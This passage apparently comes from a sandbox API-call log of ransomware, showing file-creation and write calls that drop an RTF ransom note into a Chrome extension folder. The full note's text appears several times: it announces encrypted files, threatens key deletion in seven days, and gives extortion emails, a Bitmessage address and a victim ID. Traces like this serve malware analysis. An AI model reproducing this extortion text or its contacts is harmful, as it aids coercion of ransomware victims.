:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.515] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.516] CloseHandle (hObject=0x2c8) returned 1 [0272.516] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0272.516] GetLastError () returned 0x2 [0272.516] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 